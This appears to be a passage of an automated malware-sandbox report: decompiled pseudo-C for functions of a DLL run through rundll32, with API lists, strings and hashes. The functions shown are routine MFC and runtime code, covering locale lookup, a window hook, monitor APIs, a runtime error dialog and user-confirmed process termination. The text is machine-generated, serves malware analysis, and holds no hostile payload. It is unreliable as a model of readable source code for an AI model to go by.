API String ID: 1228543026-2889995556
Opcode ID: bf7b4985ae92c6bd7c5630eeafef62ad09b9eeabf33068a1c07c41dd6e422063
Instruction ID: 31c0d7829d7537357120e2ccb8a191263865439c3fe81528d26a29f8d241e412
Opcode Fuzzy Hash: bf7b4985ae92c6bd7c5630eeafef62ad09b9eeabf33068a1c07c41dd6e422063
Instruction Fuzzy Hash: 060135708407D89ACB30EFB6AC88C87BAE4EEC47103524D2EE28587610D7759882CF45

Uniqueness

Uniqueness Score: -1.00%

Function 1002695A Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 167
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E1002695A(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				void* _v28;
				void* _v32;
				int _v36;
				int _v40;
				signed short _v44;
				int _v52;
				int _v56;
				int _v60;
				int _v64;
				intOrPtr _t42;
				struct HINSTANCE__* _t43;
				_Unknown_base(*)()* _t44;
				struct HINSTANCE__* _t46;
				signed int _t50;
				signed short _t65;
				signed int _t66;
				int _t70;
				signed short _t71;
				signed int _t72;
				signed short _t78;
				signed int _t79;
				char* _t85;
				int _t87;
				signed int _t98;
				signed int _t103;
				int _t104;
				int _t105;
				void* _t109;
				void* _t113;

				_t42 =  *0x100371f4; // 0x82d1d2ba
				_t85 = 0;
				_v8 = _t42;
				_v28 = 0;
				_t43 = GetModuleHandleA("kernel32.dll");
				_v36 = _t43;
				_t44 = GetProcAddress(_t43, "GetUserDefaultUILanguage");
				if(_t44 == 0) {
					if(GetVersion() >= 0) {
						_t46 = GetModuleHandleA("ntdll.dll");
						if(_t46 == 0) {
							L13:
							 *((intOrPtr*)(_t113 + 0xffffffffffffffc4)) = 0x800;
							_t109 = 1;
							_t103 = 0;
							if(1 <= _t85) {
								L16:
								L17:
								return E10011A49(0, _v8);
							}
							while(E100268C5(_t109, _a4,  *((intOrPtr*)(_t113 + _t103 * 4 - 0x3c))) == _t85) {
								_t103 =  &(1[_t103]);
								if(_t103 < _t109) {
									continue;
								}
								goto L16;
							}
							goto L17;
						}
						_v28 = 0;
						EnumResourceLanguagesA(_t46, 0x10, 1, E10026944,  &_v28);
						if(_v28 == 0) {
							goto L13;
						}
						_t50 = _v28 & 0x0000ffff;
						_t104 = _t50 & 0x3ff;
						_v64 = ConvertDefaultLocale(_t50 & 0x0000fc00 | _t104);
						_v60 = ConvertDefaultLocale(_t104);
						_push(2);
						L12:
						_pop(0);
						goto L13;
					}
					_v32 = 0;
					if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v32) == 0) {
						_v36 = 0x10;
						if(RegQueryValueExA(_v32, 0, 0,  &_v40,  &_v24,  &_v36) == 0 && _v40 == 1 && E10011A57( &_v24, "%x",  &_v44) == 1) {
							_t65 = _v44;
							_v28 = _t65;
							_t66 = _t65 & 0x0000ffff;
							_t105 = _t66 & 0x3ff;
							_v64 = ConvertDefaultLocale(_t66 & 0x0000fc00 | _t105);
							_t70 = ConvertDefaultLocale(_t105);
							_push(2);
							_v60 = _t70;
							_pop(0);
						}
						RegCloseKey(_v32);
					}
					goto L13;
				}
				_t71 =  *_t44();
				_v28 = _t71;
				_t72 = _t71 & 0x0000ffff;
				_t98 = _t72 & 0x3ff;
				_v32 = _t98;
				_v64 = ConvertDefaultLocale(_t72 & 0x0000fc00 | _t98);
				_v60 = ConvertDefaultLocale(_v32);
				_t78 =  *(GetProcAddress(_v36, "GetSystemDefaultUILanguage"))();
				_v28 = _t78;
				_t79 = _t78 & 0x0000ffff;
				_t87 = _t79 & 0x3ff;
				_v56 = ConvertDefaultLocale(_t79 & 0x0000fc00 | _t87);
				_v52 = ConvertDefaultLocale(_t87);
				_push(4);
				_t85 = 0;
				goto L12;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1002697D
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10026988
ConvertDefaultLocale.KERNEL32(?), ref: 100269B9
ConvertDefaultLocale.KERNEL32(?), ref: 100269C1
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100269CE
ConvertDefaultLocale.KERNEL32(?), ref: 100269E8
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100269EE
GetVersion.KERNEL32 ref: 100269FC
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 10026A21
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10026A47
ConvertDefaultLocale.KERNEL32(?), ref: 10026A93
ConvertDefaultLocale.KERNEL32(76EC4DE0), ref: 10026A99
RegCloseKey.ADVAPI32(?), ref: 10026AA4

Strings

ntdll.dll, xrefs: 10026AAC
Control Panel\Desktop\ResourceLocale, xrefs: 10026A14
GetUserDefaultUILanguage, xrefs: 1002697F
GetSystemDefaultUILanguage, xrefs: 100269C3
kernel32.dll, xrefs: 10026970

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$AddressProc$CloseHandleModuleOpenQueryValueVersion
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 780041395-483790700
Opcode ID: c8a88ec8f47b05ad6fb245185dc5288cdd2804bb649a9a9da442faf80c01cdf3
Instruction ID: 7e66ab4c7d9ead5553d2abc86c9b376326854eeb3e409b15c23ea205f87c9181
Opcode Fuzzy Hash: c8a88ec8f47b05ad6fb245185dc5288cdd2804bb649a9a9da442faf80c01cdf3
Instruction Fuzzy Hash: C8517E72E00229AEDF10DFE5DC85AEEBEF8EB08354F50403AE900E3140DB7899458BA1

Uniqueness

Uniqueness Score: -1.00%

Function 10021B60 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E10021B60(void* __ebx, void* __edi, void* __esi, int _a4, int _a8, long _a12) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				char _v272;
				struct _WNDCLASSEXA _v320;
				void* __ebp;
				intOrPtr _t52;
				signed int _t56;
				char _t58;
				long _t60;
				int _t71;
				long _t81;
				CHAR* _t83;
				void* _t90;
				void* _t99;
				long* _t102;
				signed int _t104;
				long _t105;
				CHAR* _t107;
				int _t108;

				_t52 =  *0x100371f4; // 0x82d1d2ba
				_push(E100272A4);
				_v8 = _t52;
				_t90 = E100285E7(0x100381c0);
				if(_a4 == 3) {
					_t104 =  *(_t90 + 0x14);
					_t99 =  *_a12;
					_t56 =  *(E10027747() + 0x14) & 0x000000ff;
					_a4 = _t56;
					if(_t104 != 0 || ( *(_t99 + 0x23) & 0x00000040) == 0 && _t56 == 0) {
						if( *0x1003a0ec == 0) {
							L10:
							if(_t104 == 0) {
								if( *0x10039b40 != 0) {
									L16:
									if(GetClassLongA(_a8, 0xffffffe0) !=  *0x10039b40) {
										L20:
										_t58 = GetWindowLongA(_a8, 0xfffffffc);
										_v16 = _t58;
										if(_t58 != 0) {
											_t107 = "AfxOldWndProc423";
											if(GetPropA(_a8, _t107) == 0) {
												SetPropA(_a8, _t107, _v16);
												if(GetPropA(_a8, _t107) == _v16) {
													GlobalAddAtomA(_t107);
													SetWindowLongA(_a8, 0xfffffffc, E10021A08);
												}
											}
										}
										goto L24;
									}
									goto L24;
								}
								_t108 = 0x30;
								E10012400( &_v320, 0, _t108);
								_v320.cbSize = _t108;
								_t71 = GetClassInfoExA(0, "#32768",  &_v320);
								 *0x10039b40 = _t71;
								if(_t71 == 0) {
									if(GetClassNameA(_a8,  &_v272, 0x100) == 0) {
										goto L20;
									}
									_v17 = 0;
									if(E10012518( &_v272, "#32768") == 0) {
										goto L24;
									}
									goto L20;
								}
								goto L16;
							}
							E10020ACD(_t104, _a8);
							 *((intOrPtr*)( *_t104 + 0x50))();
							_t102 =  *((intOrPtr*)( *_t104 + 0xf0))();
							_t81 = SetWindowLongA(_a8, 0xfffffffc, E1002113E);
							if(_t81 != E1002113E) {
								 *_t102 = _t81;
							}
							 *(_t90 + 0x14) =  *(_t90 + 0x14) & 0x00000000;
							goto L24;
						}
						if((GetClassLongA(_a8, 0xffffffe6) & 0x00010000) != 0) {
							goto L24;
						}
						_t83 =  *(_t99 + 0x28);
						if(_t83 <= 0xffff) {
							_v16 = 0;
							GlobalGetAtomNameA(0,  &_v16, 5);
							_t83 =  &_v16;
						}
						if(lstrcmpiA(_t83, "ime") == 0) {
							goto L24;
						}
						goto L10;
					} else {
						L24:
						_t105 = CallNextHookEx( *(_t90 + 0x28), 3, _a8, _a12);
						if(_a4 != 0) {
							UnhookWindowsHookEx( *(_t90 + 0x28));
							 *(_t90 + 0x28) =  *(_t90 + 0x28) & 0x00000000;
						}
						_t60 = _t105;
						goto L27;
					}
				} else {
					_t60 = CallNextHookEx( *(_t90 + 0x28), _a4, _a8, _a12);
					L27:
					return E10011A49(_t60, _v8);
				}
			}

APIs

Part of subcall function 100285E7: __EH_prolog.LIBCMT ref: 100285EC

CallNextHookEx.USER32 ref: 10021B95
GetClassLongA.USER32 ref: 10021BDA
GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 10021C06
lstrcmpiA.KERNEL32(?,ime,?,?,100272A4), ref: 10021C15
SetWindowLongA.USER32 ref: 10021C4F
CallNextHookEx.USER32 ref: 10021D53
UnhookWindowsHookEx.USER32(?), ref: 10021D64

Strings

#32768, xrefs: 10021C90, 10021C95, 10021CE1
ime, xrefs: 10021C0F
AfxOldWndProc423, xrefs: 10021D0A, 10021D0F, 10021D1C, 10021D26, 10021D31

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Hook$CallLongNext$AtomClassGlobalH_prologNameUnhookWindowWindowslstrcmpi
String ID: #32768$AfxOldWndProc423$ime
API String ID: 3204395069-4034971020
Opcode ID: 923eef9dd91d4174ed10fd3cb48fd684776ebcdb7cc3cd8fe7fd22e0e5c3795c
Instruction ID: 7ccca2d111f462454a1591929b606a3c27235dd0c2c2c0b15024cba99a7efe61
Opcode Fuzzy Hash: 923eef9dd91d4174ed10fd3cb48fd684776ebcdb7cc3cd8fe7fd22e0e5c3795c
Instruction Fuzzy Hash: 1951C339500269EFDB11DF60EC88BDD7BB9FF183A1FA14165F914AA1A1C730DA41DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10007FDE Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10007FDE() {
				intOrPtr _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100399ec; // 0x0
				if(_t23 == 0) {
					 *0x100399f0 = E10007F91();
					_t18 = GetModuleHandleA("USER32");
					if(_t18 == 0) {
						L11:
						 *0x100399d0 = 0;
						 *0x100399d4 = 0;
						 *0x100399d8 = 0;
						 *0x100399dc = 0;
						 *0x100399e0 = 0;
						 *0x100399e4 = 0;
						 *0x100399e8 = 0;
						 *0x100399ec = 1;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						 *0x100399d0 = _t6;
						if(_t6 == 0) {
							goto L11;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							 *0x100399d4 = _t7;
							if(_t7 == 0) {
								goto L11;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								 *0x100399d8 = _t8;
								if(_t8 == 0) {
									goto L11;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									 *0x100399dc = _t9;
									if(_t9 == 0) {
										goto L11;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										 *0x100399e4 = _t10;
										if(_t10 == 0) {
											goto L11;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											 *0x100399e0 = _t11;
											if(_t11 == 0) {
												goto L11;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												 *0x100399e8 = _t12;
												if(_t12 == 0) {
													goto L11;
												} else {
													_t5 = 1;
													 *0x100399ec = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					return _t5;
				} else {
					_t24 =  *0x100399e0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,?,?,?,1000812F), ref: 10008007
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10008023
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10008034
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10008045
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10008056
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10008067
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10008078
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008089

Strings

GetSystemMetrics, xrefs: 1000801D
MonitorFromRect, xrefs: 1000803F
GetMonitorInfoA, xrefs: 10008072
USER32, xrefs: 10007FFD
MonitorFromWindow, xrefs: 1000802E
MonitorFromPoint, xrefs: 10008050
EnumDisplayDevicesA, xrefs: 10008083
EnumDisplayMonitors, xrefs: 10008061

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: c93b96fe13b95e912f4d2d8e059c62a8ca00f1ac8a7e19ff652396150d5c17ed
Instruction ID: 5875a88fa52cc7419f87466d3cb8e46c9f590408e74f8792abd6e8fcf3c29728
Opcode Fuzzy Hash: c93b96fe13b95e912f4d2d8e059c62a8ca00f1ac8a7e19ff652396150d5c17ed
Instruction Fuzzy Hash: F0216D70D022299EF783DF7E9CC1A6ABAE4F7482C0391043FD288DA122DB704849CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10016F7C Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 115
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 71%

			E10016F7C() {
				intOrPtr _t20;
				int _t21;
				long _t24;
				void* _t31;
				void* _t51;
				long _t52;
				void* _t57;
				signed int _t67;
				void** _t69;
				void* _t70;
				void* _t72;
				void* _t73;

				_t70 = _t72 - 0x8c;
				_t73 = _t72 - 0x10c;
				_t20 =  *0x100371f4; // 0x82d1d2ba
				_t52 =  *(_t70 + 0x94);
				 *((intOrPtr*)(_t70 + 0x88)) = _t20;
				_t21 = 0;
				while(_t52 !=  *((intOrPtr*)(0x10037a90 + _t21 * 8))) {
					_t21 = _t21 + 1;
					if(_t21 < 0x13) {
						continue;
					}
					break;
				}
				_t67 = _t21 << 3;
				_t6 = _t67 + 0x10037a90; // 0x98000000
				if(_t52 ==  *_t6) {
					_t21 =  *0x1003a168; // 0x0
					if(_t21 == 1 || _t21 == 0 &&  *0x1003a16c == 1) {
						_t17 = _t67 + 0x10037a94; // 0x1002ef98
						_t69 = _t17;
						_t24 = E10012000( *_t69);
						_t21 = WriteFile(GetStdHandle(0xfffffff4),  *_t69, _t24, _t70 + 0x94, 0);
					} else {
						if(_t52 != 0xfc) {
							 *((char*)(_t70 + 0x84)) = 0;
							if(GetModuleFileNameA(0, _t70 - 0x80, 0x104) == 0) {
								E10018100(_t70 - 0x80, "<program name unknown>");
							}
							_t63 = _t70 - 0x80;
							if(E10012000(_t70 - 0x80) + 1 > 0x3c) {
								E10019990(E10012000(_t63) + _t70 - 0x45, "...", 3);
								_t73 = _t73 + 0x10;
							}
							_t31 = E10012000(_t63);
							_t12 = _t67 + 0x10037a94; // 0x1002ef98
							_t14 = E10012000( *_t12) + 0x1c; // 0x1c
							_pop(_t57);
							E100116D0(_t31 + _t14 + 0x00000003 & 0xfffffffc, _t57);
							_t51 = _t73;
							E10018100(_t51, "Runtime Error!\n\nProgram: ");
							E10018110(_t51, _t63);
							E10018110(_t51, "\n\n");
							_t15 = _t67 + 0x10037a94; // 0x1002ef98
							E10018110(_t51,  *_t15);
							_push(0x12010);
							_push("Microsoft Visual C++ Runtime Library");
							_push(_t51);
							_t21 = E1001A6B4();
						}
					}
				}
				return E10011A49(_t21,  *((intOrPtr*)(_t70 + 0x88)));
			}

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000,00000000), ref: 10016FFD
_strcat.LIBCMT ref: 10017010
_strlen.LIBCMT ref: 1001701D
_strlen.LIBCMT ref: 1001702C
_strncpy.LIBCMT ref: 10017043
_strlen.LIBCMT ref: 1001704C
_strlen.LIBCMT ref: 10017059
_strcat.LIBCMT ref: 10017077
_strlen.LIBCMT ref: 100170BF
GetStdHandle.KERNEL32(000000F4,1002EF98,00000000,?,00000000,00000000,00000000,00000000), ref: 100170CA
WriteFile.KERNEL32(00000000), ref: 100170D1

Strings

Microsoft Visual C++ Runtime Library, xrefs: 1001709F
Runtime Error!Program: , xrefs: 10017071
<program name unknown>, xrefs: 1001700A
..., xrefs: 1001703D

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$File_strcat$HandleModuleNameWrite_strncpy
String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
API String ID: 3601721357-4022980321
Opcode ID: 68c8764e1a8a42900aa5bb584917c7e94fc290cdcfd1a0eeb1350683dc03f151
Instruction ID: 8b4e2df600865ae8db0bab592805acf6cceea193a26af140cc90876f2b48fa7d
Opcode Fuzzy Hash: 68c8764e1a8a42900aa5bb584917c7e94fc290cdcfd1a0eeb1350683dc03f151
Instruction Fuzzy Hash: 4031F372500248AAE732DA74DC85EAE37B8FB48340F20091AF64ADE153DA34EAD58721

Uniqueness

Uniqueness Score: -1.00%

Function 10006650 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 159
windowsleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E10006650(void* __ecx) {
				void* __ebp;
				void* _t31;
				int _t38;
				intOrPtr* _t44;
				intOrPtr* _t46;
				signed int _t58;
				signed int _t59;
				signed int _t67;
				signed int _t74;
				signed int _t78;
				void* _t84;
				intOrPtr* _t87;
				void* _t88;
				int _t89;
				void* _t90;

				_t84 = __ecx;
				 *(_t90 + 0x1c) = 0x128;
				_t31 = CreateToolhelp32Snapshot(0xf, 0);
				 *(_t84 + 0x74) = _t31;
				 *(_t84 + 0x77c) = Process32First(_t31, _t90 + 0x14);
				do {
					E10011245(_t84 + 0x178, "%08X",  *(_t90 + 0x1c));
					_t90 = _t90 + 0xc;
					_t89 = 0;
					if(SendMessageA( *(_t84 + 0x9cc), 0x1004, 0, 0) > 0) {
						do {
							if(SendMessageA( *(_t84 + 0x9cc), 0x102c, _t89, 2) == 2) {
								_push(1);
								_push(_t89);
								_push(_t90 + 0x18);
								_t44 =  *((intOrPtr*)(E1001D60B(_t84 + 0x9b0)));
								_t87 = _t84 + 0x178;
								while(1) {
									_t78 =  *_t44;
									_t58 =  *_t87;
									_t67 = _t78;
									if(_t78 != _t58) {
										break;
									}
									if(_t67 == 0) {
										L9:
										_t44 = 0;
										L11:
										_t59 = _t58 & 0xffffff00 | _t44 == 0x00000000;
										_t46 =  *((intOrPtr*)(_t90 + 0x10)) + 0xfffffff0;
										asm("lock xadd [ecx], edx");
										if((_t78 | 0xffffffff) - 1 <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t46)) + 4))(_t46);
										}
										if(_t59 != 0) {
											E10011245(_t90 + 0x140, "Are You want to terminate\n%s", _t90 + 0x38);
											_t90 = _t90 + 0xc;
											if(E1002027F(_t84, _t90 + 0x144, 0, 4) == 6) {
												_t88 = OpenProcess(0x100001, 0,  *(_t90 + 0x1c));
												if(TerminateProcess(_t88, 0) != 0) {
													CloseHandle(_t88);
												} else {
													E10011245(_t90 + 0x140, "Failed to terminate\n%s", _t90 + 0x38);
													_t90 = _t90 + 0xc;
													E1002027F(_t84, _t90 + 0x144, 0, 0);
												}
											}
										}
										goto L18;
									}
									_t78 =  *((intOrPtr*)(_t44 + 1));
									_t58 =  *((intOrPtr*)(_t87 + 1));
									_t74 = _t78;
									if(_t78 != _t58) {
										break;
									}
									_t44 = _t44 + 2;
									_t87 = _t87 + 2;
									if(_t74 != 0) {
										continue;
									}
									goto L9;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L11;
							}
							L18:
							_t89 = _t89 + 1;
						} while (_t89 < SendMessageA( *(_t84 + 0x9cc), 0x1004, 0, 0));
					}
					_t38 = Process32Next( *(_t84 + 0x74), _t90 + 0x14);
					 *(_t84 + 0x77c) = _t38;
				} while (_t38 != 0);
				CloseHandle( *(_t84 + 0x74));
				Sleep(0x1f4);
				return E10005C90(_t84);
			}

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 10006668
Process32First.KERNEL32(00000000,00000000), ref: 10006676
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 100066B0
SendMessageA.USER32(?,0000102C,00000000,00000002), ref: 100066CF
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 100067ED

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32(?,0000102D,?,-00000044), ref: 1001D670

OpenProcess.KERNEL32(00100001,00000000,?,?,00000000,00000004,?,00000000,00000001), ref: 1000678B
TerminateProcess.KERNEL32(00000000,00000000), ref: 10006796
CloseHandle.KERNEL32(00000000), ref: 100067D0
Process32Next.KERNEL32 ref: 10006800
CloseHandle.KERNEL32(?,?,?), ref: 10006817
Sleep.KERNEL32(000001F4), ref: 10006822

Strings

Failed to terminate%s, xrefs: 100067AC
Are You want to terminate%s, xrefs: 10006759
%08X, xrefs: 1000668C

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$CloseHandleProcessProcess32$CreateFirstH_prologNextOpenSleepSnapshotTerminateToolhelp32
String ID: %08X$Are You want to terminate%s$Failed to terminate%s
API String ID: 2677561046-3360442637
Opcode ID: ddf8eb443103b2f02dc7b0564349c69ce226a1a7f92cd43cff0101d72a6388b3
Instruction ID: 26037f420bde038a9de5e87ed646fa7b37689810b46713e8eead2fc80cc2110d
Opcode Fuzzy Hash: ddf8eb443103b2f02dc7b0564349c69ce226a1a7f92cd43cff0101d72a6388b3
Instruction Fuzzy Hash: 8B512871644702AFE310DF74CC85FEB7BAAEF89394F104618F6598B191EB71B4098B90

Uniqueness

Uniqueness Score: -1.00%

Function 100100C5 Relevance: 22.9, APIs: 15, Instructions: 359
windowkeyboardCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E100100C5() {
				void* __ebx;
				signed int _t112;
				signed int _t115;
				signed int _t118;
				signed char _t119;
				signed int _t122;
				signed int _t123;
				signed int _t127;
				void* _t132;
				signed char _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed char _t147;
				intOrPtr _t148;
				signed int _t149;
				short _t153;
				signed int _t154;
				signed int _t155;
				signed int _t156;
				signed int _t163;
				signed char _t164;
				signed int _t165;
				signed int _t166;
				short _t169;
				WPARAM _t171;
				signed int _t172;
				intOrPtr* _t173;
				void* _t174;
				signed int _t186;
				void* _t189;
				signed int _t191;
				WPARAM _t203;
				struct tagMSG* _t208;
				signed int _t209;
				signed int _t211;
				int _t213;
				signed int _t214;
				int _t217;
				signed int _t218;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t228;

				E10011A8C(E1002ADC7, _t226);
				_t112 =  *(_t226 + 8);
				 *((intOrPtr*)(_t226 - 0x10)) = _t228 - 0x20;
				if(_t112 != 0) {
					 *(_t226 - 0x28) =  *(_t112 + 0x1c);
				} else {
					 *(_t226 - 0x28) =  *(_t226 - 0x28) & _t112;
				}
				_t208 =  *(_t226 + 0xc);
				_t217 = _t208->message;
				 *(_t226 - 0x18) = _t217;
				 *(_t226 - 0x2c) = GetFocus();
				_t115 = E10020A8C(_t226, _t114);
				 *(_t226 - 0x14) = _t115;
				if(_t217 < 0x100 || _t217 > 0x109) {
					if(_t217 < 0x200 || _t217 > 0x209) {
						goto L27;
					} else {
						goto L7;
					}
				} else {
					L7:
					if(_t115 == 0) {
						L27:
						 *((intOrPtr*)(_t226 - 0x1c)) = E10020A8C(_t226, _t208->hwnd);
						_t218 = 0;
						 *(_t226 - 0x24) =  *(_t226 - 0x24) & 0;
						_t118 =  *(_t226 - 0x18) - 0x100;
						__eflags = _t118;
						 *((intOrPtr*)(_t226 - 0x20)) = 2;
						if(_t118 == 0) {
							_t119 = E1000F94B( *((intOrPtr*)(_t226 - 0x1c)), _t208);
							_t186 = _t208->wParam & 0x0000ffff;
							__eflags = _t186 - 0x1b;
							if(__eflags > 0) {
								__eflags = _t186 - 0x25;
								if(_t186 < 0x25) {
									L47:
									_t209 = IsDialogMessageA( *( *(_t226 + 8) + 0x1c),  *(_t226 + 0xc));
									__eflags = _t209;
									if(_t209 != 0) {
										_t132 = E10020A8C(_t226, GetFocus());
										__eflags = _t132 -  *(_t226 - 0x14);
										if(_t132 !=  *(_t226 - 0x14)) {
											E1000FDCA(E10020A8C(_t226, GetFocus()));
										}
									}
									L50:
									_t122 = IsWindow( *(_t226 - 0x2c));
									__eflags = _t122;
									if(_t122 != 0) {
										E1000FE37( *(_t226 - 0x14), E10020A8C(_t226, GetFocus()));
										_pop(_t189);
										_t127 = IsWindow( *(_t226 - 0x28));
										__eflags = _t127;
										if(_t127 != 0) {
											E1000FFE5(_t189,  *(_t226 + 8),  *(_t226 - 0x14), E10020A8C(_t226, GetFocus()));
										}
									}
									_t123 = _t209;
									goto L54;
								}
								__eflags = _t186 - 0x26;
								if(_t186 <= 0x26) {
									 *(_t226 - 0x24) = 1;
									L81:
									_t136 = E1000F94B( *(_t226 - 0x14), _t208);
									__eflags = _t136 & 0x00000001;
									if((_t136 & 0x00000001) != 0) {
										goto L47;
									}
									__eflags =  *(_t226 - 0x24);
									_t191 =  *(_t226 + 8);
									_push(0);
									if( *(_t226 - 0x24) == 0) {
										_t137 = E10022E74(_t191);
									} else {
										_t137 = E10022D78(_t191);
									}
									_t222 = _t137;
									__eflags = _t222;
									if(_t222 == 0) {
										goto L47;
									} else {
										__eflags =  *(_t222 + 8);
										if( *(_t222 + 8) != 0) {
											E10022F70( *(_t226 + 8), _t222);
										}
										__eflags =  *(_t222 + 4);
										if( *(_t222 + 4) == 0) {
											_t138 =  *_t222;
											__eflags = _t138;
											if(_t138 == 0) {
